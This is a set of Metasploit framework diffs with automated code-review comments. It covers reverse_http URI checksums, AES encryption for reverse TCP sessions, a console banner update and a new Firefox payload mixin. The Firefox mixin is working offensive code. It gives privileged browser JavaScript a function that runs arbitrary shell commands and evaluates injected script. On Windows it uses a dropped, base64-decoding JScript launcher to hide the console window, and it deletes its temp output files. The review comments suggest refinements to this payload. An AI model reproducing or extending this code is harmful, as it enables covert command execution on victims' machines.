"BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t",
"7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG",
"kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM",
"aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg",
"zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"
]
# Map "random" URIs to static strings, allowing us to randomize
# the URI sent in the first request.
# @param uri_match [String] The URI string to convert back to the original static value
# @return [String] The static URI value derived from the checksum
def process_uri_resource(uri_match)
# This allows 'random' strings to be used as markers for
# the INIT and CONN request types, based on a checksum
uri_strip, uri_conn = uri_match.split('_', 2)
uri_strip.sub!(/^\//, '')
uri_check = Rex::Text.checksum8(uri_strip)
# Match specific checksums and map them to static URIs
case uri_check
when URI_CHECKSUM_INITW
uri_match = "/INITM"
when URI_CHECKSUM_INITJ
uri_match = "/INITJM"
when URI_CHECKSUM_CONN
uri_match = "/CONN_" + ( uri_conn || Rex::Text.rand_text_alphanumeric(16) )
end
uri_match
end
# Create a URI that matches a given checksum
# @param sum [Fixnum] The checksum value you are trying to create a URI for
# @return [String] The URI string that checksums to the given value
def generate_uri_checksum(sum)
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
32.times do
uri = Rex::Text.rand_text_alphanumeric(3)
chk.sort_by {rand}.each do |x|
return(uri + x) if Rex::Text.checksum8(uri + x) == sum
end
end
# Otherwise return one of the pre-calculated strings
return URI_CHECKSUM_PRECALC[sum]
end
end
end
end
end
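Review bot: generate_uri_checksum shuffles the candidate charset with `chk.sort_by {rand}`, the pre-1.8.7 idiom; `chk.shuffle.each do |x|` says the same thing directly and avoids 62 rand calls plus a sort on every one of the 32 iterations. The precalculated fallback `URI_CHECKSUM_PRECALC[sum]` returns nil for any sum outside 0..255 (the table holds exactly 256 entries), so a caller passing a bad constant gets nil back as a URI; a guard such as `raise ArgumentError, "sum must be 0..255" unless (0..255).include?(sum)` at the top makes the contract explicit. Since this file is a verbatim move out of reverse_http.rb, both points applied to the old code as well.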


@ -172,12 +172,12 @@ module ReverseTcp
socks[0].extend(Rex::Socket::Tcp)
socks[1].extend(Rex::Socket::Tcp)
m = OpenSSL::Digest::Digest.new('md5')
m = OpenSSL::Digest.new('md5')
m.reset
key = m.digest(datastore["AESPassword"] || "")
Rex::ThreadFactory.spawn('AESEncryption', false) {
c1 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8')
c1 = OpenSSL::Cipher.new('aes-128-cfb8')
c1.encrypt
c1.key=key
sock.put([0].pack('N'))
@ -190,7 +190,7 @@ module ReverseTcp
sock.close()
}
Rex::ThreadFactory.spawn('AESEncryption', false) {
c2 = OpenSSL::Cipher::Cipher.new('aes-128-cfb8')
c2 = OpenSSL::Cipher.new('aes-128-cfb8')
c2.decrypt
c2.key=key
iv=""


@ -449,6 +449,9 @@ class Module
ch = self.compat['Nop']
elsif (mod.type == MODULE_PAYLOAD)
ch = self.compat['Payload']
if self.respond_to?("target") and self.target and self.target['Payload'] and self.target['Payload']['Compat']
ch = ch.merge(self.target['Payload']['Compat'])
end
else
return true
end
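Review bot: The new guard chains four conditions with `and`, which binds more loosely than `=` and `.` and is the form usually reserved for control flow; it reads more clearly as a local: `target_compat = self.respond_to?(:target) && self.target && self.target['Payload'] && self.target['Payload']['Compat']` followed by `ch = ch.merge(target_compat) if target_compat`. Note that Hash#merge is shallow, so a key present in both the module-level `compat['Payload']` and the target's Compat is replaced wholesale rather than combined; if target-overrides-module is the intent, a one-line comment saying so would help the next reader. The enclosing method starts before this hunk.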


@ -516,4 +516,12 @@ class Msf::Module::Platform
Rank = 100
Alias = "nodejs"
end
#
# Firefox
#
class Firefox < Msf::Module::Platform
Rank = 100
Alias = "firefox"
end
end


@ -29,6 +29,7 @@ class Payload < Msf::Module
require 'msf/core/payload/netware'
require 'msf/core/payload/java'
require 'msf/core/payload/dalvik'
require 'msf/core/payload/firefox'
##
#


@ -0,0 +1,191 @@
# -*- coding: binary -*-
require 'msf/core'
require 'json'
module Msf::Payload::Firefox
# Javascript source code of setTimeout(fn, delay)
# @return [String] javascript source code that exposes the setTimeout(fn, delay) method
def set_timeout_source
%Q|
var setTimeout = function(cb, delay) {
var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
return timer;
};
|
end
# Javascript source code of readFile(path) - synchronously reads a file and returns
# its contents. The file is deleted immediately afterwards.
#
# @return [String] javascript source code that exposes the readFile(path) method
def read_file_source
%Q|
var readFile = function(path) {
try {
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(path);
var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
.createInstance(Components.interfaces.nsIFileInputStream);
fileStream.init(file, 1, 0, false);
var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
.createInstance(Components.interfaces.nsIBinaryInputStream);
binaryStream.setInputStream(fileStream);
var array = binaryStream.readByteArray(fileStream.available());
binaryStream.close();
fileStream.close();
file.remove(true);
return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
} catch (e) { return ""; }
};
|
end
# Javascript source code of runCmd(str,cb) - runs a shell command on the OS
#
# Because of a limitation of firefox, we cannot retrieve the shell output
# so the stdout/err are instead redirected to a temp file, which is read and
# destroyed after the command completes.
#
# On posix, the command is double wrapped in "/bin/sh -c" calls, the outer of
# which redirects stdout.
#
# On windows, the command is wrapped in two "cmd /c" calls, the outer of which
# redirects stdout. A JScript "launch" file is dropped and invoked with wscript
# to run the command without displaying the cmd.exe prompt.
#
# When the command contains the pattern "[JAVASCRIPT] ... [/JAVASCRIPT]", the
# javascript code between the tags is eval'd and returned.
#
# @return [String] javascript source code that exposes the runCmd(str) method.
def run_cmd_source
%Q|
#{read_file_source}
#{set_timeout_source}
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
var windows = (ua.indexOf("Windows")>-1);
var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
var runCmd = function(cmd, cb) {
cb = cb \|\| (function(){});
if (cmd.trim().length == 0) {
setTimeout(function(){ cb("Command is empty string ('')."); });
return;
}
var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
if (js) {
var tag = "[!JAVASCRIPT]";
var sync = true; // avoid zalgo's reach
var sent = false;
var retVal = null;
try {
retVal = Function('send', js[1])(function(r){
if (sent) return;
sent = true
if (r) {
if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
else cb(false, r+tag+"\\n");
}
});
} catch (e) { retVal = e.message; }
sync = false;
if (retVal && !sent) {
sent = true;
setTimeout(function(){ cb(false, retVal+tag+"\\n"); });
}
return;
}
var shEsc = "\\\\$&";
var shPath = "/bin/sh -c"
if (windows) {
shPath = "cmd /c";
shEsc = "\\^$&";
var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8+rand(12))}.js');
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
.createInstance(Components.interfaces.nsIFileOutputStream);
stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
stream.write(jscript, jscript.length);
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
stream.finish();
} else {
stream.close();
}
}
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
stdout.append(stdoutFile);
if (windows) {
var shell = shPath+" "+cmd;
shell = shPath+" "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>&1";
var b64 = svcs.btoa(shell);
} else {
var shell = shPath+" "+cmd.replace(/\\W/g, shEsc);
shell = shPath+" "+shell.replace(/\\W/g, shEsc) + " >"+stdout.path+" 2>&1";
}
var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
var sh = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
if (windows) {
sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
process.init(sh);
var args = [jscriptFile.path, b64];
process.run(true, args, args.length);
jscriptFile.remove(true);
setTimeout(function(){cb(false, cmd+"\\n"+readFile(stdout.path));});
} else {
sh.initWithPath("/bin/sh");
process.init(sh);
var args = ["-c", shell];
process.run(true, args, args.length);
setTimeout(function(){cb(false, readFile(stdout.path));});
}
};
|
end
# This file is dropped on the windows platforms to a temp file in order to prevent the
# cmd.exe prompt from appearing. It is executed and then deleted.
#
# @return [String] JScript that reads its command-line argument, decodes
# base64 and runs it as a shell command.
def jscript_launcher
%Q|
var b64 = WScript.arguments(0);
var dom = new ActiveXObject("MSXML2.DOMDocument.3.0");
var el = dom.createElement("root");
el.dataType = "bin.base64"; el.text = b64; dom.appendChild(el);
var stream = new ActiveXObject("ADODB.Stream");
stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);
stream.Position=0; stream.type=2; stream.CharSet = "us-ascii"; stream.Position=0;
var cmd = stream.ReadText();
(new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);
|
end
end
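Review bot: The two platform branches of `runCmd` hand different results to the callback: the Windows branch passes `cmd+"\n"+readFile(stdout.path)` while the POSIX branch passes only `readFile(stdout.path)`, so callers see the command echoed on one platform and not the other; unless the echo is deliberate, the Windows line should read `setTimeout(function(){cb(false, readFile(stdout.path));});`. The callback contract is also undocumented and the tag is out of date: the `@return` for `run_cmd_source` names `runCmd(str)` but the function is `runCmd(cmd, cb)`, and `cb` receives an error string as its first argument only for an empty command and `false` otherwise; suggest `# @return [String] javascript source code that exposes runCmd(cmd, cb); cb(err, output) gets a String err only for an empty command, false otherwise.` Separately, `stdout.path` is spliced unquoted into the `" >"+stdout.path+" 2>&1"` redirection in both branches, so a temp directory whose path contains a space would presumably break the redirect and leave the output file unread — worth confirming on a Windows profile with such a path.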


@ -397,15 +397,15 @@ class Core
banner << "\n\n"
end
banner << " =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr\n"
banner << " =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr ]\n"
banner << "+ -- --=[ "
banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post\n"
banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post ]\n"
banner << "+ -- --=[ "
oldwarn = nil
avdwarn = nil
banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops\n"
banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops ]\n"
if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate)
tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d")
banner << " =[ svn r#{::Msf::Framework::RepoRevision} updated #{::Msf::Framework::RepoUpdatedDaysNote} (#{tstamp})\n"
@ -428,6 +428,15 @@ class Core
avdwarn << ""
end
# We're running a two week survey to gather feedback from users.
# Let's make sure we reach regular msfconsole users.
# TODO: Get rid of this sometime after 2014-01-23
survey_expires = Time.new(2014,"Jan",22,23,59,59,"-05:00")
if Time.now.to_i < survey_expires.to_i
banner << "+ -- --=[ Answer Q's about Metasploit and win a WiFi Pineapple Mk5 ]\n"
banner << "+ -- --=[ http://bit.ly/msfsurvey (Expires #{survey_expires.ctime}) ]\n"
end
# Display the banner
print_line(banner)
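Review bot: `if Time.now.to_i < survey_expires.to_i` converts both sides to epoch integers for no gain; `Time` is `Comparable`, so `if Time.now < survey_expires` reads better and differs only at sub-second granularity. The survey line points at a URL shortener, `http://bit.ly/msfsurvey`, whose destination is opaque to the reader and can be re-pointed after the fact; for a banner shown to every console user a direct URL on a project-controlled domain would be the safer choice. The `TODO` gives the removal date, which is good, but the expiry is duplicated between the comment (2014-01-23) and `Time.new(2014,"Jan",22,23,59,59,"-05:00")`, so a short comment tying the two together (end of day Jan 22 Eastern) would avoid a later mismatch. The enclosing method begins and ends outside this hunk.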


@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
# Specify the payload in hex as an extra file..
payload_hex = exe.unpack('H*')[0]


@ -64,29 +64,30 @@ LEV_3 = 3
#
# Architecture constants
#
ARCH_ANY = '_any_'
ARCH_X86 = 'x86'
ARCH_X86_64 = 'x86_64'
ARCH_X64 = 'x64' # To be used for compatability with ARCH_X86_64
ARCH_MIPS = 'mips'
ARCH_MIPSLE = 'mipsle'
ARCH_MIPSBE = 'mipsbe'
ARCH_PPC = 'ppc'
ARCH_PPC64 = 'ppc64'
ARCH_CBEA = 'cbea'
ARCH_CBEA64 = 'cbea64'
ARCH_SPARC = 'sparc'
ARCH_CMD = 'cmd'
ARCH_PHP = 'php'
ARCH_TTY = 'tty'
ARCH_ARMLE = 'armle'
ARCH_ARMBE = 'armbe'
ARCH_JAVA = 'java'
ARCH_RUBY = 'ruby'
ARCH_DALVIK = 'dalvik'
ARCH_PYTHON = 'python'
ARCH_NODEJS = 'nodejs'
ARCH_TYPES =
ARCH_ANY = '_any_'
ARCH_X86 = 'x86'
ARCH_X86_64 = 'x86_64'
ARCH_X64 = 'x64' # To be used for compatability with ARCH_X86_64
ARCH_MIPS = 'mips'
ARCH_MIPSLE = 'mipsle'
ARCH_MIPSBE = 'mipsbe'
ARCH_PPC = 'ppc'
ARCH_PPC64 = 'ppc64'
ARCH_CBEA = 'cbea'
ARCH_CBEA64 = 'cbea64'
ARCH_SPARC = 'sparc'
ARCH_CMD = 'cmd'
ARCH_PHP = 'php'
ARCH_TTY = 'tty'
ARCH_ARMLE = 'armle'
ARCH_ARMBE = 'armbe'
ARCH_JAVA = 'java'
ARCH_RUBY = 'ruby'
ARCH_DALVIK = 'dalvik'
ARCH_PYTHON = 'python'
ARCH_NODEJS = 'nodejs'
ARCH_FIREFOX = 'firefox'
ARCH_TYPES =
[
ARCH_X86,
ARCH_X86_64,
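Review bot: The re-aligned line `ARCH_X64 = 'x64' # To be used for compatability with ARCH_X86_64` carries the misspelling over into the new side; since the line is rewritten anyway, `# To be used for compatibility with ARCH_X86_64` fixes it at no cost. The new `ARCH_FIREFOX = 'firefox'` constant has no comment, unlike the neighbouring `ARCH_X64`; a one-liner noting that it is the architecture counterpart of the `Msf::Module::Platform::Firefox` alias added in this same commit would help readers who come across only one of the two.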
@ -107,7 +108,8 @@ ARCH_TYPES =
ARCH_RUBY,
ARCH_DALVIK,
ARCH_PYTHON,
ARCH_NODEJS
ARCH_NODEJS,
ARCH_FIREFOX
]
ARCH_ALL = ARCH_TYPES
